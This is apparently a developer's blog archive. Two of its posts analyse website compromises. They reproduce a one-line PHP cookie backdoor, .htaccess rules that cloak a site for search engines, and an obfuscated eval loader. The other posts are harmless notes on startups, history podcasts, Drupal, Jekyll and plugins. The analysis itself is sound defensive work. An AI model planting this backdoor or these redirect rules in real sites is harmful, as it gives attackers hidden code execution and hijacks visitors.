New WP Hack


So this new hit me pretty hard today. Normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and was beginning to question what was what when, lo and behold in the Google SERP: This site may be hacked.

Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set. 

All files were touched by the hack, the line:

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

added to each core file. index.php, .htaccess and file in root called post.php where altered/added respectively. Because of their size I put them up on github at:

Yep, this server was rooted.




Start Up Idea


Here is my start up idea:

We provide companies with Razor scooters, ping pong tables, beer kegs, pretty people with nice teeth, and a photographer. We show up, have a party, take pictures and you can post them online to show how cutting edge you are.

It’s a win/win. You get to market what a cool company you have without actually having all those stupid distractions, and I make money off your stupidity thinking that’s what it takes to market a cool company.

This idea is for sale. $400. Yes, you can just take the idea, but I’ll put a Gypsy curse on you, if you do. For your piece of mind, $400 is pretty cheap.

King of Kings :: addendum


You have finished the latest Dan Carlin epic cast: King of Kings, including that 5 hour finally! Now what? You want more, but unsure where to turn? How about some extra material to help you dig into the history


Screen Shot 2016-08-22 at 1.15.16 PM

History on Fire Podcast
History professor Daniele Bolelli
The 10,000 part 1
The 10,000 part 2






Screen Shot 2016-08-22 at 1.15.35 PMGates of Fire: An Epic Novel of the Battle of Thermopylae
Steven Pressfield

Can not recommend this enough. Great read! 5 stars from me on amazon.





Screen Shot 2016-08-22 at 1.15.55 PMThe Ten Thousand: A Novel of Ancient Greece
Michael Curtis Ford

I read this book about 2 years ago, and enjoyed it.






If you have other reads of podcasts you would like to see added this, please let me know in the comments below.

.htaccess compromised


Screen Shot 2016-08-09 at 7.08.01 AM

A simple, clean, flat html site was recently hacked for its Search Engine referrer. Arriving at the site by typing the domain, or some secondary link, would provide the site without issue. Arriving via an SE or with an SE user agent, well, that’s a paddlin’


Here’s the .htaccess file

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

Screen Shot 2016-08-09 at 7.15.35 AM

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable is


is fancy-speak for create_function

$qweboi = $meymun(‘$a’,strrev(‘;)a$(lave’));

becomes an anonymous function lambda_1. Then the next line we see a strrev(), because nothing is as secure as reversing a string. So lets do it: Hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:


That sends content. The domain?

You know they are good because they use 1’s for i’s and zero’s for o’s.





never an Always


If you are in the Drupal world you will have seen the critical updates to several modules. One of these is in our install profile. This isn’t a matter of turning off the module either. Update, or remove.

It doesn’t take me long to clean the module out of the repo and push it up, but with well over 50 sites to maintain, I don’t have a lot of time to play. Luckily the other 50 or so sites are on multisite machines, so that’s just one code base to play with. But let’s get back to brass tacks here:

I have multiple people that commit to these sites, some in house and others the clients themselves. With all this noise, one voice always rings true: Master Can Always Be Pushed to Production.

I hear what you are saying: “Of course it can, silly!”

With that I will say: Sometimes, every now and then, when things just don’t work they way they are supposed to, when the needs of the client out-weigh the needs of community, a kitten can be killed. And if core can be hacked, then can master be not-production-ready? You betcha’.

Yes, Dorothy, it is a scary world.

So when you hear someone say that master can Always be pushed up, remember that there is never an Always.

Heckle the Jekyll


I love / love / love the idea of static pages over CMS driven systems for small sites. (Even front pages of large sites, but that is another discussion!) That being said I have been bitten by the Jekyll bug, and I’m finding it a rather annoying itch.

Another idea I love is speed. Give me a fast website and I’ll be happy. Hence the love for static sites over CMS, and all that overhead.

Back to Jekyll: For a test site I setup CloudIntel. It’s a simple site used to promote the sale of the domain (and it’s sister .net domain) and is scoring a 90 on Google’s Speed Insight. Of course that shouldn’t be that hard since it is such a simple site.

The site is hosted on Github and it’s working fine, so I guess I must change something. Let’s change everything.

Gitlab has me intrigued. Mainly the Free Private Repos. Sure, github is getting my $7/month, and I have a page, but according to the fine print regs, I can only have one page. With Gitlab I can push out small sites with glee.

Well, maybe not glee. More on that in a minute.


On a random research for speeding up a WordPress site I came across Impatient Jekyll.

Blazing fast rendering Strongly optimized so that you start with high score on Google Page Speed Insights, and an excellent SpeedIndex on

Another Change

So everything seems fine.  An optimized Jekyll, a new hosting. Let’s pile on.

Add: Gulp

And now it’s broken. I think it is a gulp deploy as the hook is for github, not gitlab. Using git I can push up the site, and it all goes up, save the css. This is a common issue and has been driving me up the wall.

Looks like I’ve got some fun planned for the weekend.



WP Plugins


I was asked to do a review for a plugin and it got me thinking. Nearly every week I have a WordPress site cross my desk, usually with a security issue, and in turn I install the same plugins. I thought it would be interesting to share the couple that I use, and see if there are any favorites out there from you that you would like to share.

  1. ShortPixel
  2. Sucuri (some sites)
  3. W3 Total Cache
  4. Simple 301 Redirects & Bulk Uploader
  5. WP Database Backup (or if I can’t install a plugin)
  6. Adminer (Not a plugin)

You’ll note that Sucuri does not get put on all sites, and Adminer is not a plugin, and if is put on the site, is only temporary.

The big ones for me are ShortPixel, which is an image compressor, the W3 Total Cache and both of the 301 Redirects. These plugins help with page speed and working with the SEO team.

The Database Backup/Adminer options are there for db access. Before I do any work on a site a snapshot is taken of the db. Adminer is a stand alone PHP script for accessing MySQL databases. Yes, there are times when I only have ftp access, no plugin or otherwise access to work in the site. I can hear you “But Eric, if you have FTP can’t you ….?” You’d be surprised, just like I was when I would ftp a plugin only to have it deleted by the security software on the server. Sometimes this job is a challenge🙂

But enough of my rambling. I’m sure I’m missing some, that I’ll add later.

What are your goto plugins?